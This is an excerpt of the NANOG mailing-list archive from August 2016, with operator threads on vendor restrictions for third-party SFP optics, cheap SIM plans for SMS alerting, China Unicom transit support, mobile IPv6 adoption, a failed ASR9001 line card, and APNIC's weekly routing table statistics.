You run into very interesting problems when you're trying to use DAC cables between multi vendor. Any pointers to how to turn this of on Intel NICs and HP switches? -- Mikael Abrahamsson email: swmike at swm.pp.se From sryan at arbor.net Thu Aug 18 13:50:34 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Thu, 18 Aug 2016 13:50:34 +0000 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> , Message-ID: All of our X520's don't care if you use Arista or Proline DAC cables (the two brands we have around). Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of Ryan DiRocco Sent: Thursday, August 18, 2016 9:49:14 AM To: Mikael Abrahamsson; Mark Tinka Cc: nanog list Subject: RE: Arista unqualified SFP If you are running Intel NIC(s) such as the X520-DA2 with 3rd party optics for something like DWDM, there are driver option flags for linux/windows, etc to permit the use of the optics. In deployments we've used various branded dac cables to connect Intel branded nics to cisco/arista/brocade, without issue. As with any vendor, there is a work around procedure. -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Mikael Abrahamsson Sent: Thursday, August 18, 2016 8:33 AM To: Mark Tinka Cc: nanog list Subject: Re: Arista unqualified SFP On Thu, 18 Aug 2016, Mark Tinka wrote: > All other vendors, explicitly or silently, adopt the same approach. I've heard from people running Intel NICs and HP switches, that this can't be turned off there. You run into very interesting problems when you're trying to use DAC cables between multi vendor. 
Any pointers to how to turn this of on Intel NICs and HP switches? -- Mikael Abrahamsson email: swmike at swm.pp.se From telmnstr at 757.org Thu Aug 18 13:59:55 2016 From: telmnstr at 757.org (Ethan) Date: Thu, 18 Aug 2016 09:59:55 -0400 (EDT) Subject: Arista unqualified SFP In-Reply-To: <7f8d72f2-fd9e-d04d-42c3-a20e12f04241@nordu.net> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org> <7f8d72f2-fd9e-d04d-42c3-a20e12f04241@nordu.net> Message-ID: > I think someone from Arista said... > "We are never going to lose an affair due to not supporting 3-d party optics, but we will try to convince the customer to buy our stuff, since that's what we do, we sell stuff". > In these cheap arista switches, filling them with optics (if the optics is from ANET themselves) is usually the same cost as buying like five switches, so of course they want a share of that and they will try to convince you that 3rd party optics will make the switch go up in flames etc etc. > So its kinda easy... just present three choices. Arista is an x86 Fedora box right? Get someone to make a keygen. From me at nek0.net Thu Aug 18 14:38:30 2016 From: me at nek0.net (Stanislaw) Date: Thu, 18 Aug 2016 17:38:30 +0300 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org> <7f8d72f2-fd9e-d04d-42c3-a20e12f04241@nordu.net> Message-ID: Yeah, it is. And yeah, I was considering that option too. Ethan wrote 2016-08-18 16:59: >> I think someone from Arista said... 
>> "We are never going to lose an affair due to not supporting 3-d party
>> optics, but we will try to convince the customer to buy our stuff,
>> since that's what we do, we sell stuff".
>> In these cheap arista switches, filling them with optics (if the
>> optics is from ANET themselves) is usually the same cost as buying
>> like five switches, so of course they want a share of that and they
>> will try to convince you that 3rd party optics will make the switch go
>> up in flames etc etc.
>> So it's kinda easy... just present three choices.
>
> Arista is an x86 Fedora box right?
>
> Get someone to make a keygen.

From johnl at iecc.com Thu Aug 18 17:51:35 2016
From: johnl at iecc.com (John Levine)
Date: 18 Aug 2016 17:51:35 -0000
Subject: cheap SMS, was Email to text -
In-Reply-To:
Message-ID: <20160818175135.16264.qmail@ary.lan>

>Then I went into a t-mobile store and bought a few $25/mo SIM cards, put credit card on file to auto renew each month, slapped them in, and pointed our NMS's at them.

Since this comes up from time to time, here's the cheapest US SIM plans I know of.

Tracfone BYOD runs on AT&T or Verizon (the latter is LTE only) and the cheapest plan is $18 for 90 days if you sign up and autorenew. That gives you 180 SMS. and if you want them 180 mins of voice and 180MB of data, unused rolls over. Customer service is OK, seems to be in the US, aimed at a bilingual Spanish/English market.

Airvoice Wireless runs on AT&T. Their $10/mo plan is good for 500 SMS/mo, no rollover. Their $20/mo plan has unmetered SMS and voice. They have very good US-based customer service.

R's,
John

From eric.kuhnke at gmail.com Thu Aug 18 17:59:02 2016
From: eric.kuhnke at gmail.com (Eric Kuhnke)
Date: Thu, 18 Aug 2016 10:59:02 -0700
Subject: cheap SMS, was Email to text -
In-Reply-To: <20160818175135.16264.qmail@ary.lan>
References: <20160818175135.16264.qmail@ary.lan>
Message-ID:

The "Ting" MVNO is owned/run by the Tucows people (remember them!)
and runs on either Sprint or T-Mobile's network depending on where you are.

For very low data rate OOB access type things it can be as low as $10/mo for an active LTE SIM card.

https://ting.com/rates?ab=1

On Thu, Aug 18, 2016 at 10:51 AM, John Levine wrote:

> >Then I went into a t-mobile store and bought a few $25/mo SIM cards, put
> credit card on file to auto renew each month, slapped them in, and pointed
> our NMS's at them.
>
> Since this comes up from time to time, here's the cheapest US SIM plans I
> know of.
>
> Tracfone BYOD runs on AT&T or Verizon (the latter is LTE only) and the
> cheapest plan is $18 for 90 days if you sign up and autorenew. That
> gives you 180 SMS. and if you want them 180 mins of voice and 180MB of
> data, unused rolls over. Customer service is OK, seems to be in the
> US, aimed at a bilingual Spanish/English market.
>
> Airvoice Wireless runs on AT&T. Their $10/mo plan is good for 500
> SMS/mo, no rollover. Their $20/mo plan has unmetered SMS and voice.
> They have very good US-based customer service.
>
> R's,
> John
>

From eric.kuhnke at gmail.com Thu Aug 18 20:49:21 2016
From: eric.kuhnke at gmail.com (Eric Kuhnke)
Date: Thu, 18 Aug 2016 13:49:21 -0700
Subject: cheap SMS, was Email to text -
In-Reply-To:
References: <20160818175135.16264.qmail@ary.lan>
Message-ID:

There isn't, really, the closest you can get (on a GSM-derived, LTE network) is probably a pay-as-you-go data plan per GB on one of Rogers' sub-brands Fido or Chatr.

On Thu, Aug 18, 2016 at 11:49 AM, Sean Watkins wrote:

> Tings pricing looks really good.
>
>
> Anyone know of an equiv in Canada?
>
> Sean
>
>
> On Thu, Aug 18, 2016 at 11:59 AM, Eric Kuhnke
> wrote:
>
>> The "Ting" MVNO is owned/run by the Tucows people (remember them!) and
>> runs
>> on either Sprint or T-Mobile's network depending on where you are.
>>
>> For very low data rate OOB access type things it can be as low as $10/mo
>> for an active LTE SIM card.
>>
>> https://ting.com/rates?ab=1
>>
>>
>>
>> On Thu, Aug 18, 2016 at 10:51 AM, John Levine wrote:
>>
>> > >Then I went into a t-mobile store and bought a few $25/mo SIM cards,
>> put
>> > credit card on file to auto renew each month, slapped them in, and
>> pointed
>> > our NMS's at them.
>> >
>> > Since this comes up from time to time, here's the cheapest US SIM plans
>> I
>> > know of.
>> >
>> > Tracfone BYOD runs on AT&T or Verizon (the latter is LTE only) and the
>> > cheapest plan is $18 for 90 days if you sign up and autorenew. That
>> > gives you 180 SMS. and if you want them 180 mins of voice and 180MB of
>> > data, unused rolls over. Customer service is OK, seems to be in the
>> > US, aimed at a bilingual Spanish/English market.
>> >
>> > Airvoice Wireless runs on AT&T. Their $10/mo plan is good for 500
>> > SMS/mo, no rollover. Their $20/mo plan has unmetered SMS and voice.
>> > They have very good US-based customer service.
>> >
>> > R's,
>> > John
>> >
>> >
>
>
> --
> --
> Sean Watkins
> 403-629-6152
>

From james.braunegg at micron21.com Fri Aug 19 01:52:54 2016
From: james.braunegg at micron21.com (James Braunegg)
Date: Fri, 19 Aug 2016 01:52:54 +0000
Subject: =?Windows-1252?Q?China_Unicom_=96_Does_anyone_still_work_for_them_=3F?=
Message-ID: <934c37659e3f47859006273c43809f2b@EX-01.m21.local>

Dear All

Just wondering if anyone is responsible and proactive and wants new IP Transit sales for China Unicom ? or is it time to say good bye to using China Unicom and hello to China Telecom ?

Whilst we are a client of China Unicom purchasing IP transit, the support / service provision lead times to date has been a horrible experience.? My current contacts within the USA rarely reply to emails and services take 12 months+ to be provisioned?. staff who have been helpful in the past just disappear into thin air? It feels like they just don't want my money?. So any Advice would be great.
Looking forward to hearing from anyone who can help

Kindest Regards

James Braunegg
P: 1300 769 972 | M: 0488 997 207 | D: (03) 9751 7616
E: james.braunegg at micron21.com | ABN: 12 109 977 666
W: www.micron21.com/ddos-protection T: @micron21

Follow us on Twitter for important service and system updates.

This message is intended for the addressee named above. It may contain privileged or confidential information. If you are not the intended recipient of this message you must not use, copy, distribute or disclose it to anyone other than the addressee. If you have received this message in error please return the message to the sender by replying to it and then delete the message from your computer.

From jfbeam at gmail.com Fri Aug 19 01:59:01 2016
From: jfbeam at gmail.com (Ricky Beam)
Date: Thu, 18 Aug 2016 21:59:01 -0400
Subject: Arista unqualified SFP
In-Reply-To:
References: <22a54cac8cc717f87acfedf74e146cae@nek0.net>
 <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry>
 <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu>
Message-ID:

On Thu, 18 Aug 2016 08:05:30 -0400, Tim Jackson wrote:
> "As I'm sure you know, Arista is not the only manufacturer that has made
> this choice. Unlike our competition, we work to make our optics pricing
> competitive, but we'll never be as low as the "Taiwan specials" that you
> see floating around. I have another customer that was flashing white
> label
> optics that just made the decision to start using Arista labeled optics
> again because they were tired of bad quality."

I can't count the number of times I've seen this BS from vendors. I'm not buying crap made in a shack out in a rain forest. I'm buying the same f'ing optics from the same f'ing people as the vendor. (Finisar, Infineon, etc.) The only difference between my $10 optic and their $300 optic is the value in an EEPROM and the logo on the label.
(I know from experience, the numbers on the price sheet are inflated so sales can maintain the illusion of "deep customer discounts". As the saying goes, only an idiot pays list price.)

From eric.kuhnke at gmail.com Fri Aug 19 03:41:08 2016
From: eric.kuhnke at gmail.com (Eric Kuhnke)
Date: Thu, 18 Aug 2016 20:41:08 -0700
Subject: Arista unqualified SFP
In-Reply-To:
References: <22a54cac8cc717f87acfedf74e146cae@nek0.net>
 <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry>
 <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu>
Message-ID:

Though it would be really interesting to see, if a company like Cisco or Juniper ever suffered a major data leak, what number of customers really do pay full list price for some stuff. "Yeppers, twenty 1310nm LX 10Gb SFP+ for $4800 each, sounds good. Where do we send the check?"

On Thu, Aug 18, 2016 at 6:59 PM, Ricky Beam wrote:

> On Thu, 18 Aug 2016 08:05:30 -0400, Tim Jackson
> wrote:
>
>> "As I'm sure you know, Arista is not the only manufacturer that has made
>> this choice. Unlike our competition, we work to make our optics pricing
>> competitive, but we'll never be as low as the "Taiwan specials" that you
>> see floating around. I have another customer that was flashing white label
>> optics that just made the decision to start using Arista labeled optics
>> again because they were tired of bad quality."
>>
>
> I can't count the number of times I've seen this BS from vendors. I'm not
> buying crap made in a shack out in a rain forest. I'm buying the same f'ing
> optics from the same f'ing people as the vendor. (Finisar, Infineon, etc.)
> The only difference between my $10 optic and their $300 optic is the value
> in an EEPROM and the logo on the label.
>
> (I know from experience, the numbers on the price sheet are inflated so
> sales can maintain the illusion of "deep customer discounts". As the saying
> goes, only an idiot pays list price.)
>

From eric.kuhnke at gmail.com Fri Aug 19 03:42:16 2016
From: eric.kuhnke at gmail.com (Eric Kuhnke)
Date: Thu, 18 Aug 2016 20:42:16 -0700
Subject: =?UTF-8?Q?Re=3A_China_Unicom_=E2=80=93_Does_anyone_still_work_for_them?= =?UTF-8?Q?_=3F?=
In-Reply-To: <934c37659e3f47859006273c43809f2b@EX-01.m21.local>
References: <934c37659e3f47859006273c43809f2b@EX-01.m21.local>
Message-ID:

Is it nuts to ask if you've had fluent Mandarin or Cantonese speaking staff members contact them?

On Thu, Aug 18, 2016 at 6:52 PM, James Braunegg wrote:

> Dear All
>
> Just wondering if anyone is responsible and proactive and wants new IP
> Transit sales for China Unicom ? or is it time to say good bye to using
> China Unicom and hello to China Telecom ?
>
> Whilst we are a client of China Unicom purchasing IP transit, the support
> / service provision lead times to date has been a horrible experience.? My
> current contacts within the USA rarely reply to emails and services take 12
> months+ to be provisioned?. staff who have been helpful in the past just
> disappear into thin air? It feels like they just don't want my money?. So
> any Advice would be great.
>
> Looking forward to hearing from anyone who can help
>
> Kindest Regards
>
> James Braunegg
> P: 1300 769 972 | M: 0488 997 207 | D: (03) 9751 7616
> E: james.braunegg at micron21.com |
> ABN: 12 109 977 666
> W: www.micron21.com/ddos-protection T: @micron21
>
> Follow us on Twitter for important
> service and system updates.
>
> This message is intended for the addressee named above. It may contain
> privileged or confidential information. If you are not the intended
> recipient of this message you must not use, copy, distribute or disclose it
> to anyone other than the addressee. If you have received this message in
> error please return the message to the sender by replying to it and then
> delete the message from your computer.
>
>

From cb.list6 at gmail.com Fri Aug 19 12:10:11 2016
From: cb.list6 at gmail.com (Ca By)
Date: Fri, 19 Aug 2016 05:10:11 -0700
Subject: RIP ipv4 dominance
Message-ID:

This not RIP ipv4, but RIP dominance, on mobile, in the USA , ....

This is an epic milestone for ipv6

http://www.worldipv6launch.org/major-mobile-us-networks-pass-50-ipv6-threshold/

From surfer at mauigateway.com Fri Aug 19 12:33:43 2016
From: surfer at mauigateway.com (Scott Weeks)
Date: Fri, 19 Aug 2016 05:33:43 -0700
Subject: RIP ipv4 dominance
Message-ID: <20160819053343.79A401F4@m0087792.ppops.net>

--- cb.list6 at gmail.com wrote:

This not RIP ipv4, but RIP dominance, on mobile, in the USA , ....

This is an epic milestone for ipv6

http://www.worldipv6launch.org/major-mobile-us-networks-pass-50-ipv6-threshold/
----------------------------------------------

And from another point of view... I just saw this over on MENOG:

+++++++++++++++++++++
From: "Ahmed Abu-Abed"
To: "'menog at menog.net'"
Subject: [menog] IPv6 new milestone at Facebook
Date: Thu 08/18/16 09:39 PM

2016/08/16 - first day that more people used IPv6 to access Facebook than IPv4 from the 4 major USA mobile networks.

source: Paul Saab ? Facebook IPv6 team

https://twitter.com/yogurtboy/status/765808619434704897?refsrc=email&s=11
++++++++++++++++++++++

scott

From ryan.dirocco at totalserversolutions.com Fri Aug 19 12:38:01 2016
From: ryan.dirocco at totalserversolutions.com (Ryan DiRocco)
Date: Fri, 19 Aug 2016 12:38:01 +0000
Subject: Arista unqualified SFP
In-Reply-To:
References: <22a54cac8cc717f87acfedf74e146cae@nek0.net>
 <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry>
 <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> ,
Message-ID:

I wouldn't be surprised to see GOV contracts in that list :) It's the new $10,000 toilet seat to fund black ops!
________________________________________
From: NANOG [nanog-bounces at nanog.org] on behalf of Eric Kuhnke [eric.kuhnke at gmail.com]
Sent: Thursday, August 18, 2016 10:41 PM
To: nanog at nanog.org
Subject: Re: Arista unqualified SFP

Though it would be really interesting to see, if a company like Cisco or Juniper ever suffered a major data leak, what number of customers really do pay full list price for some stuff. "Yeppers, twenty 1310nm LX 10Gb SFP+ for $4800 each, sounds good. Where do we send the check?"

On Thu, Aug 18, 2016 at 6:59 PM, Ricky Beam wrote:

> On Thu, 18 Aug 2016 08:05:30 -0400, Tim Jackson
> wrote:
>
>> "As I'm sure you know, Arista is not the only manufacturer that has made
>> this choice. Unlike our competition, we work to make our optics pricing
>> competitive, but we'll never be as low as the "Taiwan specials" that you
>> see floating around. I have another customer that was flashing white label
>> optics that just made the decision to start using Arista labeled optics
>> again because they were tired of bad quality."
>>
>
> I can't count the number of times I've seen this BS from vendors. I'm not
> buying crap made in a shack out in a rain forest. I'm buying the same f'ing
> optics from the same f'ing people as the vendor. (Finisar, Infineon, etc.)
> The only difference between my $10 optic and their $300 optic is the value
> in an EEPROM and the logo on the label.
>
> (I know from experience, the numbers on the price sheet are inflated so
> sales can maintain the illusion of "deep customer discounts". As the saying
> goes, only an idiot pays list price.)
>

From dmitry at interhost.net Fri Aug 19 15:00:33 2016
From: dmitry at interhost.net (Dmitry Sherman)
Date: Fri, 19 Aug 2016 15:00:33 +0000
Subject: Lc fail a9k1
In-Reply-To:
References: <934c37659e3f47859006273c43809f2b@EX-01.m21.local>,
Message-ID:

Hello dear colleagues,

Any chance to recover/repair or replace failed lc on asr9001?
The line card probably dead (after flood disaster), rsp alive, flash, fans and psu also in good condition.

Thanks in advance!

Thanks

Best regards,
Dmitry Sherman
Interhost Networks
www.interhost.co.il
Dmitry at interhost.net
Mob: 054-3181182

Sent from Steve's creature

On 19 Aug 2016, at 6:44, Eric Kuhnke wrote:

Is it nuts to ask if you've had fluent Mandarin or Cantonese speaking staff members contact them?

On Thu, Aug 18, 2016 at 6:52 PM, James Braunegg wrote:

Dear All

Just wondering if anyone is responsible and proactive and wants new IP Transit sales for China Unicom ? or is it time to say good bye to using China Unicom and hello to China Telecom ?

Whilst we are a client of China Unicom purchasing IP transit, the support / service provision lead times to date has been a horrible experience.? My current contacts within the USA rarely reply to emails and services take 12 months+ to be provisioned?. staff who have been helpful in the past just disappear into thin air? It feels like they just don't want my money?. So any Advice would be great.

Looking forward to hearing from anyone who can help

Kindest Regards

James Braunegg
P: 1300 769 972 | M: 0488 997 207 | D: (03) 9751 7616
E: james.braunegg at micron21.com | ABN: 12 109 977 666
W: www.micron21.com/ddos-protection T: @micron21

Follow us on Twitter for important service and system updates.

This message is intended for the addressee named above. It may contain privileged or confidential information. If you are not the intended recipient of this message you must not use, copy, distribute or disclose it to anyone other than the addressee. If you have received this message in error please return the message to the sender by replying to it and then delete the message from your computer.
From ahebert at pubnix.net Fri Aug 19 17:17:51 2016
From: ahebert at pubnix.net (Alain Hebert)
Date: Fri, 19 Aug 2016 13:17:51 -0400
Subject: Arista unqualified SFP
In-Reply-To:
References: <22a54cac8cc717f87acfedf74e146cae@nek0.net>
 <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry>
 <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu>
Message-ID:

Well,

Context: Starting with 10Gb the optics are more finicky.

Part of that price hike include tech support (1) which you will never get from most OEM vendor.

PS: Mine is pretty good.

Having dealt with a few optic issues lately:

. Why that 10km LR won't work with that circuit, oh it's a 8.5km + fusion + etc, you're cutting it a bit short there bud, replaced them by ER's
  ( Cost: 3 weeks lag on delivery and ~10h )

. Why is that XFP ain't working in those x450, oh it's a power issue :(
  ( Cost: 6h, delivery was no issue )

But the question remains, does $290 is over charging it for that type of insurance.

PS: Approaching those issue logically with less Trumpish hyperbole make more sense, almost as much as the Juniper pricing with their 78%+ discounts off their official pricelist =D

-----
Alain Hebert                                ahebert at pubnix.net
PubNIX Inc.
50 boul. St-Charles
P.O. Box 26770     Beaconsfield, Quebec     H9W 6G7
Tel: 514-990-5911  http://www.pubnix.net    Fax: 514-990-9443

On 08/18/16 21:59, Ricky Beam wrote:
> On Thu, 18 Aug 2016 08:05:30 -0400, Tim Jackson
> wrote:
>> "As I'm sure you know, Arista is not the only manufacturer that has made
>> this choice. Unlike our competition, we work to make our optics pricing
>> competitive, but we'll never be as low as the "Taiwan specials" that you
>> see floating around. I have another customer that was flashing white
>> label
>> optics that just made the decision to start using Arista labeled optics
>> again because they were tired of bad quality."
>
> I can't count the number of times I've seen this BS from vendors. I'm
> not buying crap made in a shack out in a rain forest. I'm buying the
> same f'ing optics from the same f'ing people as the vendor. (Finisar,
> Infineon, etc.) The only difference between my $10 optic and their
> $300 optic is the value in an EEPROM and the logo on the label.
>
> (I know from experience, the numbers on the price sheet are inflated
> so sales can maintain the illusion of "deep customer discounts". As
> the saying goes, only an idiot pays list price.)
>

From eric.kuhnke at gmail.com Fri Aug 19 17:30:49 2016
From: eric.kuhnke at gmail.com (Eric Kuhnke)
Date: Fri, 19 Aug 2016 10:30:49 -0700
Subject: Arista unqualified SFP
In-Reply-To:
References: <22a54cac8cc717f87acfedf74e146cae@nek0.net>
 <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry>
 <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu>
Message-ID:

I would like to see optics made in a shack in a rain forest, maybe we can find a new market to sell hand made artisanal fair trade organic GMO-free gluten-free lasers.

On Thu, Aug 18, 2016 at 6:59 PM, Ricky Beam wrote:

> On Thu, 18 Aug 2016 08:05:30 -0400, Tim Jackson
> wrote:
>
>> "As I'm sure you know, Arista is not the only manufacturer that has made
>> this choice. Unlike our competition, we work to make our optics pricing
>> competitive, but we'll never be as low as the "Taiwan specials" that you
>> see floating around. I have another customer that was flashing white label
>> optics that just made the decision to start using Arista labeled optics
>> again because they were tired of bad quality."
>>
>
> I can't count the number of times I've seen this BS from vendors. I'm not
> buying crap made in a shack out in a rain forest. I'm buying the same f'ing
> optics from the same f'ing people as the vendor. (Finisar, Infineon, etc.)
> The only difference between my $10 optic and their $300 optic is the value
> in an EEPROM and the logo on the label.
>
> (I know from experience, the numbers on the price sheet are inflated so
> sales can maintain the illusion of "deep customer discounts". As the saying
> goes, only an idiot pays list price.)
>

From cscora at apnic.net Fri Aug 19 18:01:43 2016
From: cscora at apnic.net (Routing Analysis Role Account)
Date: Sat, 20 Aug 2016 04:01:43 +1000 (AEST)
Subject: Weekly Routing Table Report
Message-ID: <20160819180143.7D4A2AB45D@thyme.apnic.net>

This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan.

The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, SAFNOG, SdNOG, BJNOG, CaribNOG and the RIPE Routing WG.

Daily listings are sent to bgp-stats at lists.apnic.net

For historical data, please see http://thyme.rand.apnic.net.

If you have any comments please contact Philip Smith .

Routing Table Report   04:00 +10GMT Sat 20 Aug, 2016

Report Website:     http://thyme.rand.apnic.net
Detailed Analysis:  http://thyme.rand.apnic.net/current/

Analysis Summary
----------------

BGP routing table entries examined: 606224
Prefixes after maximum aggregation (per Origin AS): 219465
Deaggregation factor: 2.76
Unique aggregates announced (without unneeded subnets): 296500
Total ASes present in the Internet Routing Table: 54628
Prefixes per ASN: 11.10
Origin-only ASes present in the Internet Routing Table: 36451
Origin ASes announcing only one prefix: 15461
Transit ASes present in the Internet Routing Table: 6482
Transit-only ASes present in the Internet Routing Table: 173
Average AS path length visible in the Internet Routing Table: 4.3
Max AS path length visible: 54
Max AS path prepend of ASN ( 55644) 51
Prefixes from unregistered ASNs in the Routing Table: 61
Unregistered ASNs in the Routing Table: 16
Number of 32-bit ASNs allocated by the RIRs: 15101
Number of 32-bit ASNs visible in the Routing Table: 11695
Prefixes from 32-bit ASNs in the Routing Table: 46366
Number of bogon 32-bit ASNs visible in the Routing Table: 33
Special use prefixes present in the Routing Table: 0
Prefixes being announced from unallocated address space: 340
Number of addresses announced to Internet: 2821914468
Equivalent to 168 /8s, 50 /16s and 255 /24s
Percentage of available address space announced: 76.2
Percentage of allocated address space announced: 76.2
Percentage of available address space allocated: 100.0
Percentage of address space in use by end-sites: 98.2
Total number of prefixes smaller than registry allocations: 197037

APNIC Region Analysis Summary
-----------------------------

Prefixes being announced by APNIC Region ASes: 155735
Total APNIC prefixes after maximum aggregation: 42924
APNIC Deaggregation factor: 3.63
Prefixes being announced from the APNIC address blocks: 168786
Unique aggregates announced from the APNIC address blocks: 68899
APNIC Region origin ASes present in the Internet Routing Table: 5189
APNIC Prefixes per ASN: 32.53
APNIC Region origin ASes announcing only one prefix: 1171
APNIC Region transit ASes present in the Internet Routing Table: 928
Average APNIC Region AS path length visible: 4.5
Max APNIC Region AS path length visible: 54
Number of APNIC region 32-bit ASNs visible in the Routing Table: 2311
Number of APNIC addresses announced to Internet: 759335748
Equivalent to 45 /8s, 66 /16s and 139 /24s
APNIC AS Blocks        4608-4864, 7467-7722, 9216-10239, 17408-18431
(pre-ERX allocations)  23552-24575, 37888-38911, 45056-46079, 55296-56319,
                       58368-59391, 63488-64098, 64297-64395, 131072-137529
APNIC Address Blocks   1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8, 59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8, 150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, 223/8,

ARIN Region Analysis Summary
----------------------------

Prefixes being announced by ARIN Region ASes: 182874
Total ARIN prefixes after maximum aggregation: 89341
ARIN Deaggregation factor: 2.05
Prefixes being announced from the ARIN address blocks: 188542
Unique aggregates announced from the ARIN address blocks: 88104
ARIN Region origin ASes present in the Internet Routing Table: 16238
ARIN Prefixes per ASN: 11.61
ARIN Region origin ASes announcing only one prefix: 5734
ARIN Region transit ASes present in the Internet Routing Table: 1712
Average ARIN Region AS path length visible: 3.8
Max ARIN Region AS path length visible: 23
Number of ARIN region 32-bit ASNs visible in the Routing Table: 1402
Number of ARIN addresses announced to Internet: 1105120096
Equivalent to 65 /8s, 222 /16s and 203 /24s
ARIN AS Blocks         1-1876, 1902-2042, 2044-2046, 2048-2106
(pre-ERX allocations)  2138-2584, 2615-2772, 2823-2829, 2880-3153
                       3354-4607, 4865-5119, 5632-6655, 6912-7466
                       7723-8191, 10240-12287, 13312-15359, 16384-17407
                       18432-20479, 21504-23551, 25600-26591,
                       26624-27647, 29696-30719, 31744-33791
                       35840-36863, 39936-40959, 46080-47103
                       53248-55295, 62464-63487, 64198-64296, 393216-397212
ARIN Address Blocks    3/8, 4/8, 6/8, 7/8, 8/8, 9/8, 11/8, 12/8, 13/8, 15/8, 16/8, 17/8, 18/8, 19/8, 20/8, 21/8, 22/8, 23/8, 24/8, 26/8, 28/8, 29/8, 30/8, 32/8, 33/8, 34/8, 35/8, 38/8, 40/8, 44/8, 45/8, 47/8, 48/8, 50/8, 52/8, 53/8, 54/8, 55/8, 56/8, 57/8, 63/8, 64/8, 65/8, 66/8, 67/8, 68/8, 69/8, 70/8, 71/8, 72/8, 73/8, 74/8, 75/8, 76/8, 96/8, 97/8, 98/8, 99/8, 100/8, 104/8, 107/8, 108/8, 128/8, 129/8, 130/8, 131/8, 132/8, 134/8, 135/8, 136/8, 137/8, 138/8, 139/8, 140/8, 142/8, 143/8, 144/8, 146/8, 147/8, 148/8, 149/8, 152/8, 155/8, 156/8, 157/8, 158/8, 159/8, 160/8, 161/8, 162/8, 164/8, 165/8, 166/8, 167/8, 168/8, 169/8, 170/8, 172/8, 173/8, 174/8, 184/8, 192/8, 198/8, 199/8, 204/8, 205/8, 206/8, 207/8, 208/8, 209/8, 214/8, 215/8, 216/8,

RIPE Region Analysis Summary
----------------------------

Prefixes being announced by RIPE Region ASes: 145131
Total RIPE prefixes after maximum aggregation: 71614
RIPE Deaggregation factor: 2.03
Prefixes being announced from the RIPE address blocks: 155153
Unique aggregates announced from the RIPE address blocks: 96085
RIPE Region origin ASes present in the Internet Routing Table: 18113
RIPE Prefixes per ASN: 8.57
RIPE Region origin ASes announcing only one prefix: 7827
RIPE Region transit ASes present in the Internet Routing Table: 3018
Average RIPE Region AS path length visible: 4.4
Max RIPE Region AS path length visible: 27
Number of RIPE region 32-bit ASNs visible in the Routing Table: 5008
Number of RIPE addresses announced to Internet: 706190208
Equivalent to 42 /8s, 23 /16s and 155 /24s
RIPE AS Blocks         1877-1901, 2043, 2047, 2107-2136, 2585-2614
(pre-ERX allocations)  2773-2822, 2830-2879, 3154-3353, 5377-5631
                       6656-6911, 8192-9215, 12288-13311, 15360-16383
                       20480-21503, 24576-25599, 28672-29695
                       30720-31743, 33792-35839, 38912-39935
                       40960-45055, 47104-52223, 56320-58367
                       59392-61439, 61952-62463, 64396-64495
                       196608-207259
RIPE Address Blocks    2/8, 5/8, 25/8, 31/8, 37/8, 46/8, 51/8, 62/8, 77/8, 78/8, 79/8, 80/8, 81/8, 82/8, 83/8, 84/8, 85/8, 86/8, 87/8, 88/8, 89/8, 90/8, 91/8, 92/8, 93/8, 94/8, 95/8, 109/8, 141/8, 145/8, 151/8, 176/8, 178/8, 185/8, 188/8, 193/8, 194/8, 195/8, 212/8, 213/8, 217/8,

LACNIC Region Analysis Summary
------------------------------

Prefixes being announced by LACNIC Region ASes: 61593
Total LACNIC prefixes after maximum aggregation: 12302
LACNIC Deaggregation factor: 5.01
Prefixes being announced from the LACNIC address blocks: 76960
Unique aggregates announced from the LACNIC address blocks: 36993
LACNIC Region origin ASes present in the Internet Routing Table: 2476
LACNIC Prefixes per ASN: 31.08
LACNIC Region origin ASes announcing only one prefix: 556
LACNIC Region transit ASes present in the Internet Routing Table: 581
Average LACNIC Region AS path length visible: 4.8
Max LACNIC Region AS path length visible: 24
Number of LACNIC region 32-bit ASNs visible in the Routing Table: 2729
Number of LACNIC addresses announced to Internet: 169885504
Equivalent to 10 /8s, 32 /16s and 63 /24s
LACNIC AS Blocks       26592-26623, 27648-28671, 52224-53247, 61440-61951, 64099-64197, 262144-265628 + ERX transfers
LACNIC Address Blocks  177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8, 191/8, 200/8, 201/8,

